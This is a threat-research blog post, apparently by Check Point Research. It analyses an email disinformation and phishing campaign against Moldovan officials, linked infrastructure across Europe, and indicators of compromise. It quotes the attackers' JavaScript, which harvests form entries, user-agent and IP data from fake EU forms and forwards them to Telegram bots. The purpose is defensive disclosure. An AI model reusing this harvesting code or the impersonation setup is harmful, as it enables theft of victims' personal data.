CATEGORIES

Operation MiddleFloor: Disinformation campaign targets Moldova ahead of presidential elections and EU membership referendum

October 9, 2024

Introduction

Beginning in early August, Check Point Research observed a cyber-enabled disinformation campaign primarily targeting Moldova’s government and education sectors. Acting ahead of Moldova’s elections on October 20th, attackers behind this campaign likely seek to foster negative perceptions of European values and the EU membership process in addition to Moldova’s current pro-European leadership, with the intent of influencing the outcome of the upcoming fall elections and national referendum.

Following the start of the Russian-Ukrainian war, Moldova, a former Soviet republic, was granted EU candidate status in 2022. A nationwide referendum will be held on October 20, 2024, simultaneously with the presidential election, to determine whether the constitution should be amended to reflect the citizens’ desire for EU membership. Incumbent president Maia Sandu is actively campaigning for EU membership.

In this blog, we analyze the techniques used by the threat actors, whom we track as Lying Pigeon, in their disinformation campaign in Moldova and provide an overview of their different activity clusters in other parts of Europe in the last few years.

Key findings

  • Operation MiddleFloor is an ongoing disinformation campaign against Moldovan targets that began in early August. It uses emails as the primary distribution method instead of more common methods such as social networks or fake websites.
  • While the campaign disseminates fake emails and documents, it also aims to gather information on the victims’ environments, likely to set the stage for targeted malware attacks.
  • The threat actors use spoofed email accounts to disseminate content allegedly originating from European Union institutionsMoldavian ministries, or political figures.
  • This campaign exploits multiple sensitive topics and fears related to the current pro-European government and Moldova’s potential EU membership. These include concerns about gas supply and fuel prices ahead of winter, LGBT, potential stringent anti-corruption measures, changes in the education system, immigration from the Middle East, and general labor market shifts across Moldova and EU countries.
  • The actors behind this campaign are Russian-speaking and not fully proficient in English. Based on the Tactics, Techniques, and Procedures (TTPs), targeting, and distributed messages, Lying Pigeon appears to be aligned with Russian interests.
  • We linked Lying Pigeon to previously unattributed clusters of activity across Europe. Since early 2023, Lying Pigeon activity has been observed in several European locations related to the following themes:
    • NATO 2023 summit in Vilnius.
    • 2023 general elections in Spain, spreading disinformation about an alleged upcoming terrorist attack.
    • Polish cybersecurity scene, topics such as freedom of the press, and others.

According to CERT Polska, the actor they track as APT-UNK2 with substantial overlaps with Lying Pigeon, was also responsible for distributing infostealers in Poland and staging fake websites.

Operation MiddleFloor: email-based information campaign

Operation MiddleFloor is an anti-European and anti-government disinformation campaign targeting Moldova that primarily relies on emails to distribute its messages and gathers additional data from its targets. This approach is noteworthy because it diverges from the more common strategies seen in disinformation campaigns, such as the infamous Operation Doppelganger, which created fake versions of news websites and published misleading articles spreading pro-Russian narratives while leveraging social media to reach larger audiences quickly.

By using email-based communications, the operation can directly target individuals. Given the private nature of email, monitoring and counteracting the disinformation effectively becomes more difficult. Emails that seem to originate from trustworthy sources appear more legitimate to recipients, enhancing the credibility of the disinformation and making it easier for individuals to interact with it by clicking links, providing information, or entering personal details —and engage with the threat actors’ infrastructure.

Despite these advantages, the reach of email-based campaigns is limited, as emails rarely go viral compared to content shared on social media platforms. Additionally, the infrastructure behind email communications is more traceable, allowing authorities to track down the sources of disinformation more efficiently and take appropriate action against them.

Figure 1 – Key Operation MiddleFloor activities (as of October 1st).

Fake official European documents and forms

One of the first waves in this campaign, which occurred in early August 2024, involved the distribution of a fake PDF document aimed at Moldavian civil servants and individuals in state positions.

The document, allegedly sent by the European Commission, outlines the measures and rules that Moldavian officials must comply with once the nation becomes a member of the European Union, including:

  • The requirement to undertake an English language exam using the IELTS system and to hold a master’s degree in public administration.
  • A recommendation to raise the LGBT flag at Ministry buildings on 12 LGBT-related days throughout the year.
Figure 2 - The first two pages of the fake document sent to Moldavian
officials.
Figure 2 – The first two pages of the fake document sent to Moldavian officials.

While this document is falsified and does not reflect any actual requirements for EU members or candidate countries, the last page provides a fake email address of a genuine EU Commission expert and a feedback form (both hosted on the same malicious domain europa[.]study):

Figure 3 - Means to provide feedback (and therefore engage with the
threat actors) provided in the disinformation document.
Figure 3 – Means to provide feedback (and therefore engage with the threat actors) provided in the disinformation document.

Another fraudulent document, designed to appear as if it was from the European Public Prosecutor’s Office (EPPO), targets Moldovan officials, specifically those in the judicial system:

Figure 4 – Disinformation document claiming to be from the EPPO.
Figure 4 – Disinformation document claiming to be from the EPPO.

The document requests personal details and information about the commercial activities of close family members under the guise of adhering to the EU anti-corruption regulations. The data is supposed to be submitted via the form on the attacker-controlled domain impersonating EPPO, europa-eppo[.]eu. The document is not located on the actual EPPO document repository, does not follow the EPPO document template, and contains grammatical mistakes (such as “august” written in lowercase), indicating an obvious fake.

Victim data collection

All the fake forms have very similar code and a similar look.

Figure 5 - Example of the first pages of the form on malicious
europa-eppo[.]eu site.
Figure 5 – Example of the first pages of the form on malicious europa-eppo[.]eu site.

The HTML of these forms loads an additional script, index.js: <script src="index.js"></script>

which collects the following data:

  • All content entered in the fields from the form.
  • The user-agent of the victim using window.navigator.userAgent.
  • Data on the victims’ IP address retrieved by requesting https://ipapi.co/json/.

It then sends this data in a POST request to script.php and redirects the victim to a “form is successfully submitted” page.

const obj = {
  name: "",
  [multiple form fields omitted]
  IPData: {}, };
const form = document.getElementById("blueForm");
const firstname = document.getElementById("blueFormName");
[multiple form fields omitted]

form.onsubmit = async (e) => {
  e.preventDefault();
  obj.name = firstname.value;
  obj.surname = surname.value;
  [multiple form fields omitted]
  obj.userAgent = window.navigator.userAgent;
  await getUserIPData();
  if (isAllInputsField()) {
    console.log(obj);
    await postData(); }
};
const postData = async () => {
  const data = new FormData();
  for (param in obj) {
    if (param !== "IPData") {
      data.append(param, obj[param]); } }
  for (param in obj.IPData) {
    data.append(param, obj.IPData[param]);}
    
  await fetch("script.php", {
    method: "POST",
    body: data, 
   }).then(() => {
    window.location.href = "http://europa-eppo[.]eu/forms/3946275";
    form.reset();
  });
};
const isAllInputsField = () => {
  [UI checks on form validity omitted] };
const getUserIPData = async () => {
  return await fetch("https://ipapi.co/json/")
    .then((d) => d.json())
    .then((d) => (obj.IPData = d)); };

After the data is submitted to the server, it returns a JSON response that indicates the data was successfully sent to a Telegram bot with the name setsetinbot and the title set:

Figure 6 - Response from script.php after the collected data was sent
to the attackers,
Figure 6 – Response from script.php after the collected data was sent to the attackers,

The data gathered about the victim’s environment is not highly detailed. Still, combined with the personal information provided in the form, it could facilitate more targeted attacks, potentially including drive-by attacks. Threat actors may exploit the victim’s vulnerability to spear-phishing campaigns, especially as they have already interacted with the threat actors’ infrastructure.

Additional logging

Some other pages of these sites, such as the main page, redirect the visitor to the actual legitimate site but log the visitor’s data:

<!DOCTYPE html>
<html lang="en">
  <script src="./logger.js"></script>
  <script>
    setTimeout(() => {
      window.location.href = 'https://www.eppo.europa.eu/en'
    }, 1500);
  </script>
</html>

The script logger.js is always the same: sha256: 4df435afa20401e3af2d17bf8dd67a9d8553520e29cc05905fc9458b8e81ce8f) –
it collects the user-agent, IP address data, and the current URL visited and posts the collected data to logger.php:

const getLogs = async () => {
  const ipData = await fetch("https://ipapi.co/json")
    .then((res) => res.json())
    .then((data) => data);
  const userAgent = window.navigator.userAgent;

  const logs = {
    page: window.location.href,
    ...ipData,
    userAgent,
  };
  sendLogs(logs); };
const sendLogs = async (logs) => {
  const data = new FormData();
  for (param in logs) {
    data.append(param, logs[param]); }
  await fetch("logger.php", {
    method: "POST",
    body: data, });
};
getLogs();

The response to this request contains yet another JSON message indicating successful interaction, this time with another Telegram Bot:

[omitted]
"is_bot":true,"first_name":"TESSET_BOT","username":"TESSETTES_BOT"},"chat":{"id":-4586992285,"title":"TES","type":"group","all_members_are_administrators":true}
[omitted]

It is evident that the threat actors have distinct notifications (and distinct Telegram bots) for victims who submitted the form and for any curious users (or researchers) who visit other pages.

Fake Migration policy changes

In early September, several organizations and institutions in the Republic of Moldova, including those from the education sector, received an email with an alleged “resolution” from the Ministry of Labor and Social Protection, with information about “changes in the migration policy.”

Figure 7 – An email with pictures of the fake resolution attached on the bottom. The email was sent from a fake Ministry of Labor and Social Protection address.

Translation of the email:

Dear citizens of the Republic of Moldova,
The Ministry of Labor and Social Protection informs you about the new decree "on changes to the migration policy in the Republic of Moldova" of August 26, 2024.
Due to the large flow of migration from the Republic of Moldova, it was decided to strengthen the measures to attract migrants from the Middle East to compensate for the losses on the labor market.
We are attaching an appeal to this letter outlining the decisions taken to strengthen measures to support migrants.

Sincerely,
Principal Consultant
in the Department for Employment and Labour Migration Regulation Policies
Christina COMAN

The attached fake document contains content about “strengthening measures to attract migrants from the Middle East to compensate for the losses on the labor market due to the large migration flow from Moldova.” Among other claims, it states that the percentage of migrants in every organization must be at least 30%, that new mosques will be built in every region of the country, and that a simplified process for obtaining citizenship will be implemented for migrants employed by Moldovan companies. Moldovan officials confirmed that the document is fake.

Figure 8 - Fake document talking about radical migration policy
changes.
Figure 8 – Fake document talking about radical migration policy changes.

Fake increase in gas prices and supply interruptions

Another troubling issue being exploited by the threat actors is the topic of gas prices for the upcoming winter. In mid-September, an email claiming to be from the Ministry of Energy stated that gas prices would increase and that planned interruptions to the natural gas supply would occur during the winter:

Figure 9 – Disinformation email about gas price increase.
Figure 9 – Disinformation email about gas price increase.

Translation:

Dear citizens of the Republic of Moldova, 
The Ministry of Energy of the Republic of Moldova informs you about the increase gas tariffs for subscribers of "Moldovagaz" companies, "Energocom", "Moldovatransgaz" and "Vestmoldtransgaz". Beginning as of November 1, 2024, the new rate will be 18.06 lei per cubic meter (including VAT). We also inform you of the interruption planned supply of natural gas during the evening from 1 October 2024 to January 1, 2025. We hope for your understanding your. We try to do our best for life comfortable of the citizens of the Republic of Moldova, therefore, socially vulnerable groups will have the opportunity to apply compensations.
The order is attached to this letter. Also, the order will be duplicated on the official website of the Ministry of Energy of the Republic Moldova.  

Sincerely, 
Secretary General of the Ministry of Energy of the Republic of Moldova, 
Cristina PERETEATCU

The Ministry of Energy already reported this message as disinformation. Despite attempts to make their emails appear legitimate, the threat actors confused the name of the General Secretary of the Ministry of Energy, Andrei Grițco, with that of the State Secretary within the Ministry of Energy, Cristina Pereteatcu.

Fake EU education values

Among the emails sent by the threat actors, some lacked attachments. One of these emails impersonated a member of the European Commission Cabinets using the spoofed domain europa-ec[.]eu and was sent to more than 80 recipients at one of the most prestigious universities in Europe:

Figure 10 – A disinformation email regarding changes in the education
system.
Figure 10 – A disinformation email regarding changes in the education system.

The email claims to promote a pro-European message, using the current president, Maia Sandu, as a source of inspiration, but spreads disinformation about European education values and standards. For example, deliberately lowering student grades to encourage academic growth is not accepted in European education policy or discourse. The email also features false restrictions on job opportunities for low-performing students and misleading requirements for working abroad within the EU. All these claims contradict the EU’s education policies, prioritizing equity, inclusion, and fairness.

The second wave of disinformation emails targeting employees of education institutions was sent on September 24 from a fake email domain impersonating the Moldovian Ministry of Education and Research. The emails contained PDF titled Privind aprobarea Programului ambasadorilor UE.pdf (“Regarding the approval of the EU Ambassador Program”). The PDF included a picture of the alleged official order from the Ministry, with content primarily focused on topics such as sex education and non-binary genders in context of educational institutions integration into the European Union.

Attribution

The email mentioned above about European education values was written in English yet contains some structural errors that suggest it was translated from another language. These include phrases such as “has already addressed to you” and “instill tolerance to all genders”, which are likely literal translations of those phrases from Russian.

The email’s first numbered point, which addresses gender equality, refers to “toilets for the middle floor”, a phrase that does not make sense in English. This is a literal translation from the Russian phrase «туалеты для среднего пола», meaning gender-neutral toilets.

Another argument supporting the Russian-speaking origins of Lying Pigeon is the metadata of both PDF documents which are purportedly from European institutions.

Figure 11 – Metadata of Letter_Directorate-General for Neighbourhood and Enlargement Negotiations.pdf (left) and Notification.pdf (right) PDFs impersonating the EU institutions.

Both list ru-RU for Language metadata, meaning that the document was created using the Russian language local or regional setting. The document metadata lists UTC+3 for the time zone. A segment of the Moldavan population speaks Russian, and in August, the Moldavan time zone corresponds to UTC+3 due to Daylight Saving time; in addition, parts of Russia and Belarus, and some other countries in Eastern Europe, the Middle East, and Africa are located in the UTC+3 time zone.

Lying Pigeon infrastructure and past activity

Over the course of Operation MiddleFloor, the threat actors used a few domain name registrars to register the domains that spoof European and Moldovan entities:

  • Zone Media OÜ [Zone.EU] impersonates European Union entities, such as europa-eppo[.]eu.
  • NameCheap and Realtime Register B.V. for more generic domains such as gov-md[.]com.
  • Starting in September, the threat actors registered domains in .MD zone to impersonate Moldovan entities, such as energie-gov[.]md, for greater legitimacy.

All the domains and IP addresses used in this campaign are interconnected, enabling us to attribute these seemingly different techniques and messages to the same operation.

Figure 12 – Maltego graph of the MiddleFloor infrastructure.

All the servers used in this campaign can be classified into two categories:

  • Shared VPS on AS 200313 (IT WEB LTD) – For domain resolutions and hosting the forms. This hosting provider is often used by multiple threat actors to conduct malicious activities.
  • Dedicated mail servers – Hosted mostly on BlueVPS, the actors started to use OVH servers only since September 23. In the first half of the campaign, the threat actors used the email server mail.mailogon[.]online for a few different domains.

The threat actors use Mailcow, an open-source mail server suite, to host their own servers for anonymity and greater flexibility and to manage and scale their operations.

Figure 13 – Screenshot from censys.io showing the email servers used by the threat actors (as of October 1st).

Connection to earlier activities

On August 6, one of the early domains related to Operation MiddleFloor, europa[.]study, and its Sogo subdomain was temporarily resolved to 185.255.132[.]69 hosted on AS 204997 (First Server Limited).

Figure 14 - DNS resolutions of europa[.]study.
Figure 14 – DNS resolutions of europa[.]study.

In the period of November 2023 – March 2024, this IP also hosted another cluster of domains:
otllook[.]comsapsap[.]site (also autoconfig.sapsap[.]site and autodiscover.sapsap[.]site), te-storg[.]com (also autoconfig.te-storg[.]com and autodiscover.te-storg[.]com), mailorun[.]su (also mail.mailorun[.]su, autodiscover.mailorun[.]su and autoconfig.mailorun[.]su).

We determined that this cluster likely belongs to the same threat actors responsible for the MiddleFloor operation due to the following reasons:

  • Judging by the certificates, all these “old” domains belong to the same actor.
  • No other activity has been observed on this IP address since then.
  • The IP address 185.255.132[.]69 hosted an email server with a similar Mailcow and Let’s Encrypt certificate setup.
  • One of these domains, mailorun[.]su, mimics Mailgun; the MiddleFloor campaign also used the domain mailgon[.]online.

Most of these domains – otllook[.]com, mailorun[.]su, and te-storg[.]com – are registered with the same email address: gotohends@inbox[.]eu. In addition, over time, a few more domains were registered with this same email address:

vilnius-summit[.]lt
litexpo-portal[.]lt
viilnius[.]lt
nask-pl[.]com
sso-log[.]com

This set of domains creates multiple additional pivot points, such as the IP address 45.133.148[.]35 and shared mail server, mail.mailos[.]ru.

Based on these domains and their pivots, we identified a few additional clusters of Lying Pigeon’s previous activity. We suspect that those domains that are resolved to specific IP address, have an SPF record an MX record pointing to the same IP, were likely meant to send spoofed emails.

Figure 15 – Lying Pigeon infrastructure over the years and clusters of their activity and interests.

2023 NATO summit and Lithuanian entities

The 32nd formal meeting of the heads of state and governments of the thirty-one members of the North Atlantic Treaty Organization, their partner countries, and the European Union, was held in Vilnius, Lithuania, on July 11-12, 2023. This cluster of domains was observed within a short time frame around the event.

DomainEntity spoofedIP resolutionASNTime frame
vilnius-summit[.]ltNATO summit45.133.148[.]35AS 49505
(JSC Selectel)
08.07.2023 – 12.07.2023
urm-lt[.]comLithuanian Ministry of Foreign Affairs45.133.148[.]35AS 49505
(JSC Selectel)
11.07.2023 – 08.04 2024
viilnius[.]ltLithuanian capital185.251.88[.]12AS 35278
(Sprinthost.ru LLC)
12.07.2023 – 13.07.2023
litexpo-portal[.]ltLITEXPO, NATO summit venue185.251.88[.]12AS 35278
(Sprinthost.ru LLC)
12.07.2023 – 13.07.2023

2023 General Elections in Spain

The Spanish general election to elect members of the Congress of Deputies and the Senate, which comprise the country’s legislative parliament was held on July 23, 2023. Pivoting on existing domains and IP addresses, this cluster of activity includes the following domains, all of whom existed around the election date:

DomainEntity spoofedIP resolutionASNTime frame
comunicacion-presidencia-gov[.]esCommunication office of the Presidency45.133.148[.]35AS 49505
(JSC Selectel)
22.07.2023-23.07.2023
comunidad-madrid[.]esCommunity of Madrid185.251.88[.]12AS 35278
(Sprinthost.ru LLC)
22.07.2023-23.07.2023
interior-gov[.]esMinistry of the Interior (Spain)185.251.88[.]12AS 35278
(Sprinthost.ru LLC)
23.07.2023

The last two domains were observed as part of a disinformation campaign discovered by QuoIntelligence. This campaign was targeting Russian-speaking communities in Spain the day before the elections with Telegram messages that linked to a fake website mimicking the website of the Community of Madrid. The fake website contained a warning from the Ministry of Interior about a planned series of attacks by the ETA, a Basque separatist organization. The message encouraged recipients to skip voting in the elections to avoid risking their lives. QuoIntelligence researchers also noted that the campaign used fewer delivery methods (e.g., no email-based vectors or massive social media campaigns) to spread the message. We suspect that the first domain in this cluster, comunicacion-presidencia-gov[.]es, which contains MX records pointing to the mail server mail.mailos[.]ru at the same time, might have been used for email-based attacks, but as of now do not have any firm evidence.

Figure 16 – Web archive copy of the fake terrorist attack warning.

XXXII Economic Forum in Karpacz, Poland

The Economic Forum took place from September 5-7, 2023, in Karpacz. It attracted over 5,400 participants, including politicians, business leaders, and cultural figures from across Europe and other continents. The Forum featured a wide range of discussions, debates, and special sessions on crucial topics like the economy, security, and the future of Europe.

DomainEntity spoofedIP resolutionASNTime frame
isw-org[.]plFundacja Instytut Studiów Wschodnich (Foundation Institute of Eastern Studies) which organized Economic Forum45.133.148[.]35AS 49505
(JSC Selectel)
02.09.2023- 9.07.2023
golebewski[.]plThe Gołębiewski Hotel in Karpacz where the Forum took place at45.133.148[.]35AS 49505
(JSC Selectel)
02.09.2023 – 08.09.2023

Poland cybersecurity and technology cluster — Connection with APT-UNK2

DomainEntity spoofedIP resolutionTime frameTime frame
cert-pl[.]plCERT Polska45.133.148[.]35AS 49505
(JSC Selectel)
23.08.2023 – 06.09.2023
ivention[.]plEvention.pl, hosted the KSC Forum in Poland in August 202345.133.148[.]35AS 49505
(JSC Selectel)
04.08.2023 – 08.09.2023
nask-pl[.]comNASK – National Research Institute under the supervision of the Polish Ministry of Digital Affairs194.58.112[.]174 (REG.RU default shared IP), MX pointing to legitimate mailgun.org serversAS 197695
(Domain names registrar REG.RU )
28.09.2023 – 31.03.2024

The CERT Polska report:

CERT Polska reported that the threat actor they track as APT-UNK2 carried out a campaign involving the impersonation of NASK (a Polish research and development organization, data networks operator, and internet domain name registry operator for the .pl country-level top-level domain). The campaign used the domain nask-pl[.]com to distribute emails, which contained an attachment that included a PDF (md5: cff5b518a247756febc43386ad1ecc88) with instructions and a Dropbox link for installing malicious Network_CPP_Shield.msi (md5: 609c677a134efac42bfefe6d58451caf). Victims’ machines were infected with the Lumma Infostealer.

Figure 17 - Fake “CPP Shield installation instructions” from the
NASK.
Figure 17 – Fake “CPP Shield installation instructions” from the NASK.

Other domains

Other domains that didn’t fit the clusters described above:

DomainCommentIP resolutionASNTime frame
freepresunlimited[.]orgSpoofs Free Press Unlimited, an NGO focused on international press freedom45.133.148[.]35AS 49505
(JSC Selectel)
04.08.2023 – 31.03.2024
nnmnnm[.]ruRefers to Noname057(16), pro-Russian hacker group also known as 05716nnm or Nnm0571645.133.148[.]35AS 49505
(JSC Selectel)
24.01.2023 – 15.09.2024
noname05716[.]ruRefers to Noname057(16), pro-Russian hacker group83.69.236[.]72AS 12616
(Citytelecom LLC)
23.01.2023 – 21.01.2024
sso-log[.]comRefers to login activity38.180.59[.]182AS 9009
(M247 Europe SRL)
22.03.2024 – 10.02.2024
pass-check[.]onlineRefers to login activity38.180.59[.]182AS 9009
(M247 Europe SRL)
06.05.2024 – 01.09.2024

Some interesting patterns we observed:

  • Domains sso-log[.]com and pass-check[.]online (pivoted on the same IP addresses during the same timeframe): Judging by their names, we assume these are for use in web-based credential phishing attacks.
  • Domain nnmnnm[.]ru which also has the same email server mailos[.]ru, and noname05716[.]ru which was resolved to the same IP address as mailos[.]ru in the same timeframe. Both refer to the infamous Noname057(16) pro-Russian hacktivist group, which is known for its DDoS attacks against NATO countries. As the group never mentioned their sites in their public communications, it’s unclear what relationship, if any, exists between Lying Pigeon and Noname057(16).

Conclusion

The disinformation campaign led by Lying Pigeon represents a significant and ongoing threat to the political stability of the Republic of Moldova, particularly as the campaign seeks to influence the outcomes of both national elections and the EU membership referendum. Our investigation also connected Lying Pigeon to previous election interference activities in Spain in 2023, highlighting their persistent involvement in undermining European democratic processes. Additionally, this group has been active around major European events, such as the NATO summit and the European Economic Forum, likely using these high-profile occasions to further their disinformation efforts.

Beyond their influence operations, Lying Pigeon likely uses their campaigns to distribute infostealer malware and collect sensitive information for future targeted attacks. This dual approach of combining disinformation with information harvesting underscores the sophisticated and multifaceted nature of Lying Pigeon’s operations, making them a critical threat actor to monitor in the ongoing struggle to protect democratic integrity and ensure cybersecurity in Europe.

Indicators of Compromise

Middle Floor Cluster

europa[.]study
europa[.]social
europa-ec[.]eu
europa-eppo[.]eu
gov-md[.]com
moldova-social[.]md
social-moldova[.]md
moldova-energie[.]md
energie-gov[.]md
socialisti[.]md
socialistii[.]com
mec-gov[.]md
md-mec[.]com
moldova-mediu[.]md
eupm-moldova[.]md
mcgov[.]md
mc-md[.]com
mailgon[.]online
fb9105dc73a52d36a612157536322a7d3630c813f6acf1b997b370cfd768118c
9a06192d3d922b1e4c404d2c9bac43d3315040635c472257c7a28f51b078ccfe
0e295605cfb9d922ff94d38cad5743da9e3d7d8feddee7b42ca3e2314133a0f0
5c34498dfab981a4d9fb2b898d4e965ae7378e066bbf01ae29bc61adf1a66b2d

Mail servers

62.106.66[.]90
194.61.121[.]74
176.124.33[.]59
185.255.132[.]69
45.143.167[.]163
51.38.145[.]50
194.61.121[.]131

Lithuanian Cluster

vilnius-summit[.]lt
urm-lt[.]com
viilnius[.]lt
litexpo-portal[.]lt

Spanish Cluster

comunicacion-presidencia-gov[.]es
comunidad-madrid[.]es
interior-gov[.]es

Polish clusters

cert-pl[.]pl
ivention[.]pl
nask-pl[.]com
isw-org[.]pl
golebewski[.]pl
c8c3bcdb856b9acffa853124ed13a0cc96641691233004cbe9bf8e018edb8f1b
d1b285fbe249349ae167052d81b4ab5d7e78c14e1ae617ef0985cc101a119d82

Uncategorized domains

freepresunlimited[.]org
nnmnnm[.]ru
noname05716[.]ru
sso-log[.]com
pass-check[.]online
mailos[.]ru
mailorun[.]su
otllook[.]com
sapsap[.]site
te-storg[.]com

POPULAR POSTS

BLOGS AND PUBLICATIONS

  • Check Point Research Publications
  • Global Cyber Attack Reports
  • Threat Research
February 17, 2020

“The Turkish Rat” Evolved Adwind in a Massive Ongoing Phishing Campaign

  • Check Point Research Publications
August 11, 2017

“The Next WannaCry” Vulnerability is Here

  • Check Point Research Publications
January 11, 2018

‘RubyMiner’ Cryptominer Affects 30% of WW Networks